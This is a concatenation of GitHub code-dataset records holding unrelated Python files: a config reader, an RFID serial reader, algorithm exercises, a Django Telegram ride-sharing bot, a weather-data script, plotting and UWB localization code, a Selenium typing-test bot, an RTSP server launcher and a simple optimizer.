\"\"\"\n\n def __init__(self, fname):\n \"\"\"initiate config file\n :fname: str\n file name of config file\n \"\"\"\n self._fname = fname\n\n def get_config(self, section_name):\n \"\"\"Gets configuration from given section in config.ini.\n :section_name: str\n Name of the section\n :returns: dict\n \"\"\"\n config_map = collections.OrderedDict()\n parser = ConfigParser.SafeConfigParser()\n parser.read(self._fname)\n\n for name, value in parser.items(section_name):\n config_map[name] = value\n\n return config_map\n\n def get_table_fields(self, table):\n \"\"\"get field list of table\n :table: str\n :returns: arr\n contains strings\n \"\"\"\n field_map = self.get_config('field_map')[table]\n field_map = field_map.split(',')\n field_info = self.get_config(field_map[0])[field_map[1]]\n field_info = parse_dict(field_info).keys()\n return field_info\n\n def get_db_name(self):\n \"\"\"get relative path of database\n :returns: str\n \"\"\"\n db_info = self.get_config('database')\n db_name = db_info['name']\n return db_name\n\n","repo_name":"kivanccakmak/plate_track","sub_path":"src/fconfig.py","file_name":"fconfig.py","file_ext":"py","file_size_in_byte":2216,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"285407234","text":"import serial\nimport logging\nimport traceback\n\n\nclass Rfid(object):\n def __init__(self):\n logging.basicConfig(level=logging.INFO)\n self.logger = logging.getLogger(__name__)\n self.logger.info('Starting...')\n self.port_rf = serial.Serial('/dev/serial0',115200)\n self.logger.info('Setup completed successfully !')\n\n def read(self):\n try:\n id = \"\"\n read_byte = self.port_rf.read()\n if read_byte == \"\\x02\":\n for bits in range(12):\n read_byte = self.port_rf.read()\n id += str(read_byte)\n self.logger.info(hex(ord(read_byte)))\n self.logger.info(id)\n except:\n self.logger.error('Unexpected error: ' + traceback.format_exc())\n raise\n","repo_name":"kevinmmartins/RFIDPipenv","sub_path":"Rfid.py","file_name":"Rfid.py","file_ext":"py","file_size_in_byte":821,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"40"} +{"seq_id":"18793578260","text":"class Node:\n def __init__(self, val):\n self.val = val\n self.left = None\n self.right = None\n\nclass Tree:\n def dfs(self, root: Node):\n if root is None:\n return None\n left = self.dfs(root.left)\n right = self.dfs(root.right)\n\n #Exchange the nodes\n root.left = right\n root.right = left\n return root\n\n def invert_binary_tree(self, root: Node):\n if root is None:\n return None\n return self.dfs(root)\n \n\n# Example Binary tree:\n# 4\n# / \\\n# 2 7\n# / \\ \\\n# 1 3 6\nroot = Node(4)\nroot.left = Node(2)\nroot.right = Node(7)\nroot.left.left = Node(1)\nroot.left.right = Node(3)\nroot.right.right = Node(6)\n\n# Invert the tree (Time Complexity O(n))\nbinaryTree = Tree()\nroot = binaryTree.invert_binary_tree(root)\n\nprint(root.left.left.val) # 6 ","repo_name":"kunal9922/DSA_Archive","sub_path":"Trees/invertBinaryTree.py","file_name":"invertBinaryTree.py","file_ext":"py","file_size_in_byte":870,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"73965245240","text":"class Solution:\n def __init__(self):\n self.longest_path = 1\n \n def longestIncreasingPath(self, matrix: List[List[int]]) -> int:\n cache = [[1 for _ in range(len(matrix[0]))] for _ in range(len(matrix))]\n visited = set()\n for row in range(len(matrix)):\n for col in range(len(matrix[0])):\n 
self._longest_increasing_path(matrix, cache, (row, col))\n return self.longest_path\n \n def _longest_increasing_path(self, matrix, cache, vert):\n row, col = vert\n if cache[row][col] != 1:\n return cache[row][col]\n for n_row, n_col in [(row + 1, col), (row - 1, col), (row, col + 1), (row, col - 1)]:\n if 0 <= n_row < len(matrix) and 0 <= n_col < len(matrix[0]):\n if matrix[n_row][n_col] < matrix[row][col]:\n path = self._longest_increasing_path(matrix, cache, (n_row, n_col))\n cache[row][col] = max(cache[row][col], path + 1)\n if cache[row][col] > self.longest_path:\n self.longest_path = cache[row][col]\n return cache[row][col]\n \n","repo_name":"csusb-005411285/CodeBreakersCode","sub_path":"longest-increasing-path-in-a-matrix.py","file_name":"longest-increasing-path-in-a-matrix.py","file_ext":"py","file_size_in_byte":1143,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"8843685211","text":"# -*- coding: utf-8 -*-\nfrom datetime import datetime, tzinfo\nimport re\n\nfrom django.conf import settings\nimport pytz\nfrom telegram import Update\nfrom telegram.ext import CallbackContext\n\nfrom carona_parque.bot.models import Car, Neighborhood, Ride, User, Zone\nfrom carona_parque.bot.utils import smart_split\n\n\nclass UserNotApproved(Exception):\n pass\n\n\ndef add_ride(update: Update, context: CallbackContext):\n # Get chat ID\n chat_id = update.effective_chat.id\n\n # Get user\n try:\n user: User = User.objects.get(telegram_chat_id=chat_id)\n if not user.approved:\n raise UserNotApproved()\n except User.DoesNotExist:\n # tell it's not registered\n update.message.reply_text(\n \"Você ainda não está cadastrado! 😓 Se deseja se cadastrar, digite `/cadastrar `\"\n )\n return\n except UserNotApproved:\n update.message.reply_text(\"Você ainda não está aprovado. Mas fique de olho! 🧐\")\n return\n\n # Get arguments (must be car_id, neighborhood_id, date, time, seats)\n args = context.args\n if len(args) != 6:\n update.message.reply_text(\n \"Você deve usar o comando `/adicionar_carona \"\n + \" `\" # noqa\n )\n return\n\n # Parse types\n try:\n car_id = int(args[0])\n except ValueError:\n update.message.reply_text(\"O id do carro deve ser um número inteiro.\")\n return\n try:\n neighborhood_id = int(args[1])\n except ValueError:\n update.message.reply_text(\"O id da vizinhança deve ser um número inteiro.\")\n return\n date = args[2]\n time = args[3]\n try:\n seats = int(args[4])\n except ValueError:\n update.message.reply_text(\"A quantidade de vagas deve ser um número inteiro.\")\n return\n try:\n price = float(args[5])\n except ValueError:\n update.message.reply_text(\"O preço deve ser um número real.\")\n return\n\n # Get car\n try:\n car: Car = Car.objects.get(id=car_id)\n assert car.user == user\n except Car.DoesNotExist:\n update.message.reply_text(\n \"Você não pode adicionar caronas carros que não são seus! \"\n + \"Para ver a lista de carros, use /carros.\" # noqa\n )\n return\n except AssertionError:\n update.message.reply_text(\n \"Você não pode adicionar caronas carros que não são seus! \"\n + \"Para ver a lista de carros, use /carros.\" # noqa\n )\n return\n\n # Get neighborhood\n try:\n neighborhood: Neighborhood = Neighborhood.objects.get(id=neighborhood_id)\n except Neighborhood.DoesNotExist:\n update.message.reply_text(\n \"A vizinhança especificada não existe. 
Use /vizinhancas para ver a \"\n + \"lista de vizinhancas.\" # noqa\n )\n return\n\n # Parse date (must be in format DD/MM/YYYY)\n try:\n date_parts = re.match(r\"(\\d{2})/(\\d{2})/(\\d{4})\", date).groups()\n date: datetime = datetime(\n int(date_parts[2]),\n int(date_parts[1]),\n int(date_parts[0]),\n tzinfo=pytz.timezone(settings.TIME_ZONE),\n )\n except AttributeError:\n update.message.reply_text(\"A data deve estar no formato DD/MM/YYYY\")\n\n # Parse time (must be in format HH:MM)\n try:\n time_parts = re.match(r\"(\\d{2}):(\\d{2})\", time).groups()\n date = date.replace(hour=int(time_parts[0]), minute=int(time_parts[1]))\n except AttributeError:\n update.message.reply_text(\"A hora deve estar no formato HH:MM\")\n\n # Assert that date is in the future\n if date < datetime.now(tz=pytz.timezone(settings.TIME_ZONE)):\n update.message.reply_text(\"A data deve ser no futuro!\")\n return\n\n # Create ride\n ride = Ride(\n car=car,\n destination=neighborhood,\n passenger_seats=seats,\n start_timestamp=date,\n price=price,\n )\n ride.save()\n\n # Send message\n update.message.reply_text(\"Carona adicionada com sucesso! 🎉\")\n\n\ndef list_rides(update: Update, context: CallbackContext):\n # Get chat ID\n chat_id = update.effective_chat.id\n\n # Get user\n try:\n user: User = User.objects.get(telegram_chat_id=chat_id)\n if not user.approved:\n raise UserNotApproved()\n except User.DoesNotExist:\n # tell it's not registered\n update.message.reply_text(\n \"Você ainda não está cadastrado! 😓 Se deseja se cadastrar, digite `/cadastrar `\"\n )\n return\n except UserNotApproved:\n update.message.reply_text(\"Você ainda não está aprovado. Mas fique de olho! 🧐\")\n return\n\n # Check if there are arguments. There must be 0, 1 or 2 arguments\n if len(context.args) > 2:\n update.message.reply_text(\n \"Você deve usar o comando `/listar_caronas` sem argumentos ou fornecendo a data \"\n + \"da carona e/ou o ID da zona.\" # noqa\n )\n return\n\n # Parse arguments\n date = None\n zone = None\n if len(context.args) > 0:\n # Try to parse useful things from arguments\n for arg in context.args:\n try:\n date_parts = re.match(r\"(\\d{2})/(\\d{2})/(\\d{4})\", arg).groups()\n date: datetime = datetime(\n int(date_parts[2]),\n int(date_parts[1]),\n int(date_parts[0]),\n tzinfo=pytz.timezone(settings.TIME_ZONE),\n )\n except AttributeError:\n pass\n try:\n zone = Zone.objects.get(id=int(arg))\n except Zone.DoesNotExist:\n pass\n except ValueError:\n pass\n # If there is no date and no zone, it's an error\n if date is None and zone is None:\n update.message.reply_text(\n \"Você deve usar o comando `/listar_caronas` sem argumentos ou fornecendo a data \"\n + \"da carona e/ou o ID da zona.\" # noqa\n )\n return\n\n # If there's a date, assure it's in the future\n if date is not None and date < datetime.now(tz=pytz.timezone(settings.TIME_ZONE)):\n update.message.reply_text(\"A data deve ser no futuro!\")\n return\n\n # Start text\n base_text = \"\"\n\n # Get current datetime\n now = datetime.now(tz=pytz.UTC)\n\n # Get rides you're driving\n rides_driving = Ride.objects.filter(car__user=user).filter(start_timestamp__gte=now)\n if rides_driving:\n base_text += \"Você irá dirigir:\\n\\n\"\n for ride in rides_driving:\n base_text += (\n \"=> \"\n + ride.start_timestamp.astimezone( # noqa\n pytz.timezone(settings.TIME_ZONE)\n ).strftime(\"%d/%m/%Y %H:%M\")\n + \"\\n\" # noqa\n )\n base_text += \" * Carro: \" + str(ride.car) + \"\\n\"\n base_text += \" * Vizinhança de destino: \" + ride.destination.name + \"\\n\"\n base_text 
+= \" * Vagas totais: \" + str(ride.passenger_seats) + \"\\n\"\n base_text += (\n \" * Vagas disponíveis: \"\n + str(ride.passenger_seats - ride.passengers.count()) # noqa\n + \"\\n\" # noqa\n )\n base_text += \" * Preço: \" + str(ride.price) + \"\\n\\n\"\n\n # Get other rides\n rides_all = Ride.objects.filter(start_timestamp__gte=now)\n if date:\n rides_all = rides_all.filter(start_timestamp__date=date)\n if zone:\n rides_all = rides_all.filter(destination__zone=zone)\n other_rides_count = 0\n if rides_all:\n for ride in rides_all:\n if ride not in rides_driving:\n if other_rides_count == 0:\n base_text += \"Todas as caronas:\\n\\n\"\n base_text += (\n \"=> \"\n + ride.start_timestamp.astimezone( # noqa\n pytz.timezone(settings.TIME_ZONE)\n ).strftime(\"%d/%m/%Y %H:%M\")\n + \"\\n\" # noqa\n )\n base_text += \" * Carro: \" + str(ride.car) + \"\\n\"\n base_text += (\n \" * Vizinhança de destino: \" + ride.destination.name + \"\\n\"\n )\n base_text += \" * Vagas totais: \" + str(ride.passenger_seats) + \"\\n\"\n base_text += (\n \" * Vagas disponíveis: \"\n + str(ride.passenger_seats - ride.passengers.count()) # noqa\n + \"\\n\" # noqa\n )\n base_text += \" * Preço: \" + str(ride.price) + \"\\n\\n\"\n other_rides_count += 1\n\n # Send message\n if not base_text:\n update.message.reply_text(\"Não existem caronas cadastradas!\")\n else:\n messages = smart_split(base_text, separator=\"\\n\\n\")\n for i, message in enumerate(messages):\n if i == 0:\n update.message.reply_text(message)\n else:\n context.bot.send_message(chat_id=chat_id, text=message)\n","repo_name":"gabriel-milan/comp-soc","sub_path":"carona_parque/bot/handlers/rides/handlers.py","file_name":"handlers.py","file_ext":"py","file_size_in_byte":9170,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"13765559529","text":"# Part. 1\n\n#=======================================\n\n# Import module\n\n# csv -- fileIO operation\n\nimport csv\n\n#=======================================\n\n\n# Part. 2\n\n#=======================================\n\n# Read cwb weather data\n\ncwb_filename = 'sample_input.csv'\n\ndata = []\n\nheader = []\n\nwith open(cwb_filename) as csvfile:\n\n mycsv = csv.DictReader(csvfile)\n\n header = mycsv.fieldnames\n\n for row in mycsv:\n\n data.append(row)\n\n#=======================================\n\n\n# Part. 
3\n\n#=======================================\n\n# Analyze data depend on your group and store it to target_data like:\n\n# Retrive all data points which station id is \"C0X260\" as a list.\n\n# target_data = list(filter(lambda item: item['station_id'] == 'C0X260', data))\n\n\n# Retrive ten data points from the beginning.\n\ndef valid(L):\n if (L['station_id'] == 'C0A880' or L['station_id'] == 'C0F9A0' or L['station_id'] == 'C0G640' or L['station_id'] == 'C0R190' or L['station_id'] == 'C0X260'):\n if (float(L['HUMD']) != -99.0 and float(L['HUMD']) != -999.0):\n return 1\n else:\n return 0\n else:\n return 0\n\ntarget_data = [['C0A880', 0], ['C0F9A0', 0],['C0G640', 0], ['C0R190', 0], ['C0X260', 0]]\nsum = {'C0A880':0, 'C0F9A0':0,'C0G640':0, 'C0R190':0, 'C0X260':0}\ntimes = {'C0A880':0, 'C0F9A0':0,'C0G640':0, 'C0R190':0, 'C0X260':0}\nl = [sum, times]\ntemp_data = list(filter(valid, data))\nfor p in temp_data:\n if p['station_id'] in sum:\n k = l[0].get(p['station_id'], 0) + float(p['HUMD'])\n l[0][p['station_id']] = k\n\n\nfor p in target_data:\n if (sum[p[0]] != 0):\n p[1] = sum[p[0]]\n else:\n p[1] = 'None'\n#=======================================\n\n# Part. 4\n#=======================================\n# Print result\nprint(target_data)\n#========================================","repo_name":"HuangWCW315/embedded_python_HW1","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1831,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"8155930215","text":"import numpy as np\r\nimport scipy as sp\r\nimport matplotlib.pyplot as plt\r\nimport matplotlib.mlab as mlab\r\n\r\nif __name__ == \"__main__\":\r\n data = np.loadtxt('data/whData.dat',dtype=np.object,comments='#',delimiter=None)\r\n X = np.array(data[:,1].astype(np.float))\r\n\r\n mean = np.mean(X)\r\n std = np.std(X)\r\n\r\n fig = plt.figure()\r\n axs = fig.add_subplot(111)\r\n\r\n x = np.linspace(mean-3.5*std,mean+3.5*std,500)\r\n axs.plot(x,mlab.normpdf(x,mean,std), 'b', label = 'normal')\r\n\r\n X = np.column_stack((X,np.zeros(X.shape[0])))\r\n\r\n axs.plot(X[:,0], X[:,1], marker='o', c='b', label = 'data')\r\n\r\n leg = axs.legend(loc='upper left', shadow=True, fancybox=True, numpoints=1)\r\n leg.get_frame().set_alpha(0.5)\r\n\r\n plt.show()\r\n plt.savefig(\"out/Task2.pdf\", facecolor='w', edgecolor='w',\r\n papertype=None, format='pdf', transparent=False,\r\n bbox_inches='tight', pad_inches=0.1)\r\n plt.close()\r\n","repo_name":"omartrinidad/pattern-recognition-bit","sub_path":"01/Task2.py","file_name":"Task2.py","file_ext":"py","file_size_in_byte":956,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"13791579897","text":"from tensorflow.keras.models import load_model\nfrom agent import Agent \nfrom market_env import Market \nimport matplotlib.pyplot as plt\n\ndef main():\n stock_name = \"GSPC_2011-03\"\n model_name = \"model_ep10.h5\"\n\n model = load_model(\"models/\" + model_name)\n window_size = model.layers[0].input.shape.as_list()[1] # 2nd item\n \n agent = Agent(window_size, model_name=model_name)\n market = Market(window_size, stock_name)\n\n state, price_data = market.reset()\n\n for t in range(market.last_data_index):\n action, bought_price = agent.act(state, price_data)\n \n next_state, next_price_data, reward, done = \\\n market.get_next_state_reward(action, bought_price)\n\n state = next_state\n price_data = next_price_data\n \n if done:\n 
print(\"--------------------------------\")\n print(\"{} total profit: {}\".format(stock_name, agent.get_total_profit()))\n print(\"--------------------------------\")\n\ndef plot_action_profit(data, action_data, profit):\n plot.plot(range(len(data)), data)\n plt.xlabel(\"data\")\n plt.ylabel(\"price\")\n\n buy, sell = False, False\n for d in range(len(data) - 1):\n if action_data == 1: # buy\n buy, = plt.plot(d, data[d], 'g*')\n elif action_data == 2:\n sel, = plt.plot(d, data[d], 'r+')\n if buy and sell:\n plt.legend([buy, sell], [\"Buy\", \"Sell\"])\n plt.title(\"Total Profit: {}\".format(profit))\n plt.savefig(\"buy_sell.png\")\n plt.show()\n\nif __name__ == \"__main__\":\n main()","repo_name":"ironmanciti/reiforcement-lecture","sub_path":"sec11_DQN_stock_trading/evaluate_app.py","file_name":"evaluate_app.py","file_ext":"py","file_size_in_byte":1596,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"26585991930","text":"import numpy as np\nimport scipy as sp\n\n\nimport matplotlib.pyplot as plt\n\nimport os\n\ndef NormalPdf(x,miu,sigma):\n para1 = 1/ (2.0*np.pi)**0.5 / sigma\n para2 = -((x-miu)*(x-miu)/2/sigma/sigma)\n return para1 * np.exp(para2)\n\ndef EvaluationFunction(pose,uwb_data,beaconset,sigma,z_offset,save_file_name):\n the_range = 20 * sigma\n r_k = 5.0\n plot_pose = [the_range*r_k,the_range*r_k]\n\n\n out_matrix = np.zeros([int(the_range*2*r_k),int(the_range*2*r_k)])\n print(range(out_matrix.shape[0]))\n for i in range(out_matrix.shape[0]):\n for j in range(out_matrix.shape[1]):\n tx = float(i) / r_k - the_range + pose[0]\n ty = float(j) / r_k -the_range +pose[1]\n\n score = 1.0\n for k in range(beaconset.shape[0]):\n # print(\"k:\",k)\n dist = np.linalg.norm([tx,ty,z_offset]-beaconset[k,:])\n score *= (NormalPdf(dist,uwb_data[k],sigma)+1e-5)\n out_matrix[i,j] = np.log(score)\n\n plt.figure(2)\n plt.contourf(out_matrix.transpose())\n plt.plot(plot_pose[0],plot_pose[1],'Dr')\n # plt.xlim(-)\n # plt.xticks([-20*sigma,20*sigma],[r'%f',r'%f'])\n # plt.xticks([])\n plt.xlabel('X/m')\n plt.ylabel('Y/m')\n show_offset = out_matrix.shape[0] / 4\n sigma = sigma / 4.0\n plt.xticks([0, show_offset, show_offset * 2, show_offset * 3, show_offset * 4],\n [str(-sigma * 20), str(-sigma * 10.0), 0.0, str(sigma * 10.0), str(sigma * 20.0)])\n plt.yticks([0, show_offset, show_offset * 2, show_offset * 3, show_offset * 4],\n [str(-sigma * 20), str(-sigma * 10.0), 0.0, str(sigma * 10.0), str(sigma * 20.0)])\n plt.savefig(save_file_name)\n # plt.show()\n # plt.plot()\n return out_matrix\n\n\n\nif __name__ == '__main__':\n\n dir_name = '/home/steve/locate/'\n z_offset = 1.8\n beaconset = np.loadtxt(dir_name+'5beaconset.data')\n uwbdata = np.loadtxt(dir_name+'5UwbData.data')\n real_pose = np.loadtxt(dir_name+'5UwbRealPose.data.csv',delimiter=',')\n\n save_dir = '/home/steve/locate/SaveProb'\n # if not os.listdir(save_dir):\n # print(\"error\")\n # if(os.ch)\n # os.mkdir(save_dir)\n\n print(real_pose.shape,uwbdata.shape)\n\n # plot_index = 227\n # m = EvaluationFunction(real_pose[plot_index,:],uwbdata[plot_index,:],beaconset,2.0,z_offset)\n print(beaconset.shape)\n print(beaconset)\n for i in range(uwbdata.shape[0]):\n EvaluationFunction(real_pose[i,:2],\n uwbdata[i,:],\n beaconset,\n 0.5,\n z_offset,\n 
save_dir+\"/{0}.jpg\".format(i))\n\n\n\n\n\n","repo_name":"wystephen/QuickFusing","sub_path":"ResultData/PlotProb.py","file_name":"PlotProb.py","file_ext":"py","file_size_in_byte":2666,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"40"} +{"seq_id":"11082375838","text":"from selenium import webdriver\nfrom time import sleep\nfrom selenium.webdriver.common.keys import Keys\nimport constants\n\n# main bot class\nclass TypingBot:\n def __init__(self):\n # neglect warnings and certificate errors to clean up terminal\n options = webdriver.ChromeOptions()\n options.add_argument('--ignore-certificate-errors')\n options.add_argument('--ignore-ssl-errors')\n options.add_experimental_option('excludeSwitches', ['enable-logging'])\n # initialize chrome driver\n self.driver = webdriver.Chrome(options=options)\n # navigate to 10fastfingers\n self.driver.get(\"https://10fastfingers.com/typing-test/english\")\n\n # set window size, close all popups \n def initialize(self):\n self.driver.set_window_size(1024, 600)\n self.driver.maximize_window()\n sleep(2)\n self.driver.find_element_by_xpath(\n '//*[@id=\"CybotCookiebotDialogBodyLevelButtonLevelOptinAllowAll\"]').click()\n sleep(5)\n try:\n self.driver.find_element_by_xpath(\n '//*[@id=\"fs-slot-footer-wrapper\"]/button').click()\n self.driver.find_element_by_xpath('//*[@id=\"Layer_1\"]').click()\n except:\n sleep(5)\n self.driver.find_element_by_xpath(\n '//*[@id=\"fs-slot-footer-wrapper\"]/button').click()\n self.driver.find_element_by_xpath('//*[@id=\"Layer_1\"]').click()\n\n # grab the word list from inner HTML\n def get_word_list(self):\n wlist = self.driver.find_element_by_id(\"wordlist\").get_attribute(\"innerHTML\")\n return wlist.split('|')\n\n def type_words(self, wpm, w_cooldown=0, l_cooldown=0):\n # find and click the input box\n box = self.driver.find_element_by_xpath('//*[@id=\"inputfield\"]')\n box.click()\n # get word list and find the timer\n wlist = self.get_word_list()\n timer = self.driver.find_element_by_id(\"timer\")\n # if theres no letter cooldown input full words \n if l_cooldown > 0:\n i = 0\n # continue typing till the we reach the total number of words given by user or timer hits 0\n while i < wpm and timer.text != \"0:00\":\n print('typing \"' + wlist[i] + '\"...')\n for key in wlist[i]:\n box.send_keys(key)\n sleep(l_cooldown)\n box.send_keys(Keys.SPACE)\n i += 1\n sleep(w_cooldown)\n else:\n i = 0\n while i < wpm and timer.text != \"0:00\":\n print('typing \"' + wlist[i] + '\"...')\n box.send_keys(wlist[i])\n box.send_keys(Keys.SPACE)\n i += 1\n sleep(w_cooldown)\n\nif __name__ == \"__main__\":\n\n print(\"\\n... 
LOADING ...\")\n\n # initialize bot object\n bot = TypingBot()\n bot.initialize()\n wlist = bot.get_word_list()\n\n # intialize type_words() parameters\n words = len(wlist)\n wc = 0\n lc = 0\n\n # MENU\n print(\"\\n-------- PICK A MODE --------\")\n print(\"1 - Very Slow\")\n print(\"2 - Slow\")\n print(\"3 - Medium\")\n print(\"4 - Fast\")\n print(\"5 - Very Fast\")\n print(\"6 - Ultra\")\n print(\"7 - Custom\")\n print(\"8 - Exit\")\n res = \"\"\n res = input(\"Enter your choice (1-8): \")\n while res not in \"12345678\":\n res = input(\"Please enter a valid choice (1-8): \")\n\n if res == \"1\":\n print(\"\\n-------- MODE: VERY SLOW --------\")\n lc = constants.VS_LC\n wc = constants.VS_WC\n elif res == \"2\":\n print(\"\\n-------- MODE: SLOW --------\")\n lc = constants.S_LC\n wc = constants.S_WC\n elif res == \"3\":\n print(\"\\n-------- MODE: MEDIUM --------\")\n lc = constants.M_LC\n wc = constants.M_WC\n elif res == \"4\":\n print(\"\\n-------- MODE: FAST --------\")\n lc = constants.F_LC\n wc = constants.F_WC\n elif res == \"5\":\n print(\"\\n-------- MODE: VERY FAST --------\")\n lc = constants.VF_LC\n wc = constants.VF_WC\n elif res == \"6\":\n print(\"\\n-------- MODE: ULTRA --------\")\n lc = constants.U_LC\n wc = constants.U_WC\n elif res == \"7\":\n print(\"\\n-------- MODE: CUSTOM --------\")\n words = input(\"Number of words to type [enter max for maximum]: \")\n if words == \"max\":\n words = len(wlist)\n else:\n words = int(words)\n lc = input(\"Letter Cooldown [enter min for minimum]: \")\n if lc == \"min\":\n lc = 0\n else:\n lc = float(lc)\n wc = input(\"Word Cooldown [enter min for minimum]: \")\n if wc == \"min\":\n wc = 0\n else:\n wc = float(wc)\n elif res == \"8\":\n bot.driver.close()\n exit()\n\n # begin the test with given arguements\n input(\"\\nPress any key to begin...\")\n bot.type_words(words, wc, lc)\n\n print(\"\\n-------- END --------\")\n","repo_name":"maazh10/typingtest-bot","sub_path":"fast_fingers.py","file_name":"fast_fingers.py","file_ext":"py","file_size_in_byte":4930,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"5643421794","text":"import subprocess\nfrom time import sleep\n\n\ndef run_rtsp_server():\n run_command = ['./rtsp-server/rtsp-simple-server', './rtsp-server/rtsp-simple-server.yml']\n server_uid = subprocess.Popen(run_command)\n try:\n while True:\n if server_uid.poll() is not None:\n server_uid = subprocess.Popen(run_command)\n sleep(2)\n except KeyboardInterrupt:\n server_uid.terminate()\n\n\nif __name__ == '__main__':\n run_rtsp_server()\n","repo_name":"Xargeras/multistreamer","sub_path":"scripts/run_rtsp_server.py","file_name":"run_rtsp_server.py","file_ext":"py","file_size_in_byte":479,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"73623289080","text":"# Declarando uma função matemática hipotética (nesse exemplo x**3 + y**2)\r\ndef func (x=None, y=None):\r\n \"\"\"\r\n Recebe: x e y\r\n Retorna: x**2 + y**2\r\n \"\"\"\r\n try:\r\n return x**2 + y**2\r\n except:\r\n print('Houve alguma falha no cálculo de função')\r\n return None\r\n\r\n# Declaração da função 'radial_dir' que fará o trabalho sujo para nós\r\ndef radial_dir(pos_init, p=0.1, ob='mini'):\r\n \"\"\"\r\n Recebe: (1) posição inicial = tupla com x e y \r\n (2) tamanho dos passos radiais = float \r\n (3) função objetiva\r\n (4) objetivo sendo 'maxi' ou 'mini'\r\n Processa: 8 vizinhanças na redondeza da pos_init\r\n Retorna: tupla com uma tuple 
dos pares da menor posição em relação à pos_init e uma flag \r\n 'eh_minimo' que aponta se chegou ao mínimo possível ou ainda não\r\n \"\"\"\r\n\r\n eh_minimo = False\r\n\r\n # Valida se a tupla possui dois argumentos, a coordenada X e a coordenada Y\r\n if (len(pos_init) != 2):\r\n print('Argumentos inválidos.')\r\n return False\r\n \r\n # Atribui as coordenadas às variáveis x0 e y0\r\n x0 = pos_init[0]\r\n y0 = pos_init[1]\r\n\r\n # Crio um dicionário para mapear os deltas para cada coordenada da redondeza.\r\n # Minha estratégia foi colocar os deltas como keys e as coordenadas como values.\r\n # Isso vai simplifcar a análise mais a frente.\r\n \r\n dicti = {}\r\n\r\n try:\r\n \r\n # V1\r\n dicti[func(x0, y0) - func(x0, y0+p)] = (x0, y0+p)\r\n # V2\r\n dicti[func(x0, y0) - func(x0 + p/(2**(0.5)), y0 + p/(2**(0.5)))] = (x0 + p/(2**(0.5)), y0 + p/(2**(0.5)))\r\n # V3\r\n dicti[func(x0, y0) - func(x0 + p, y0)] = (x0 + p, y0)\r\n # V4\r\n dicti[func(x0, y0) - func(x0 + p/(2**(0.5)), y0 - p/(2**(0.5)))] = (x0 + p/(2**(0.5)), y0 - p/(2**(0.5)))\r\n # V5\r\n dicti[func(x0, y0) - func(x0 , y0-p)] = (x0 , y0-p)\r\n # V6\r\n dicti[func(x0, y0) - func(x0 - p/(2**(0.5)), y0 - p/(2**(0.5)))] = (x0 - p/(2**(0.5)), y0 - p/(2**(0.5)))\r\n # V7\r\n dicti[func(x0, y0) - func(x0 - p, y0)] = (x0 - p, y0)\r\n # V8\r\n dicti[func(x0, y0) - func(x0 - p/(2**(0.5)), y0 + p/(2**(0.5)))] = (x0 - p/(2**(0.5)), y0 + p/(2**(0.5)))\r\n\r\n except:\r\n print('Houve alguma falha na construção do dicionário.')\r\n\r\n try:\r\n # Vamos abordar primeiro a minimização. Nesse caso, buscaremos ponto cujo delta \r\n # entre (posição atual) - (posição calculada) seja o maior possível.\r\n # Caso não haja nenhum delta positivo, nesse caso, o ponto atual é o ponto ótimo.\r\n if (ob == 'mini'):\r\n if(max(dicti.keys()) <= 0):\r\n print('Ponto atual é o ótimo')\r\n print((x0, y0))\r\n eh_minimo = True\r\n return ((x0, y0), eh_minimo)\r\n else:\r\n print('Seguem coordenadas para minimização')\r\n print(dicti[max(dicti.keys())])\r\n return (dicti[max(dicti.keys())], eh_minimo )\r\n\r\n # Vamos abordar agora a maximização. 
Nesse caso, buscaremos ponto cujo delta \r\n # entre (posição atual) - (posição calculada) seja o menor possível.\r\n # Caso não haja nenhum delta negativo, nesse caso, o ponto atual é o ponto ótimo.\r\n \r\n elif(ob == 'maxi'):\r\n if(min(dicti.keys()) >= 0):\r\n print('Ponto atual é o ótimo')\r\n print((x0, y0))\r\n eh_minimo = True\r\n return ((x0, y0), eh_minimo)\r\n else:\r\n print('Seguem coordenadas para maximixação')\r\n print(dicti[min(dicti.keys())])\r\n return (dicti[min(dicti.keys())], eh_minimo)\r\n\r\n except:\r\n print('Houve alguma falha no retorno da posição.')\r\n\r\n\r\n# Defino os parâmetros iniciais\r\npasso = 0.7\r\npos_init = (7, 7)\r\nob = 'mini'\r\nrodadas = list(range(40))\r\n\r\n# Executo o pragama 'r' vezes consecutivas perseguindo o objetivo de otimização\r\n# Além disso, farei registro das coordenadas para plotar o caminho percorrido\r\neixoX, eixoY = [pos_init[0]], [pos_init[1]]\r\nfor r in rodadas:\r\n pos_init, flag = radial_dir(pos_init, p=passo, ob=ob)\r\n eixoX.append(pos_init[0])\r\n eixoY.append(pos_init[1])\r\n if (flag):\r\n print('Para os parâmetros definidos, fizemos nosso melhor!')\r\n break\r\n\r\n# Plotando os resultados\r\nimport matplotlib.pyplot as plt\r\nplt.figure('Path')\r\nplt.title('Path to Glory')\r\nplt.plot(eixoX, eixoY, '--', color='blue')\r\nplt.show()","repo_name":"FeMaffezzolli/python_optmizer","sub_path":"optimizer.py","file_name":"optimizer.py","file_ext":"py","file_size_in_byte":4571,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"9126885715","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nfrom torchvision.models import mobilenet_v3_small, mobilenet_v3_large, MobileNet_V3_Small_Weights, MobileNet_V3_Large_Weights\n\nfrom sam.util import ConfigType\n\n__all__ = [\"MobileNetV3\", \"MobileNetV2\"]\n\nclass MobileNetV3(nn.Module):\n def __init__(self, config: 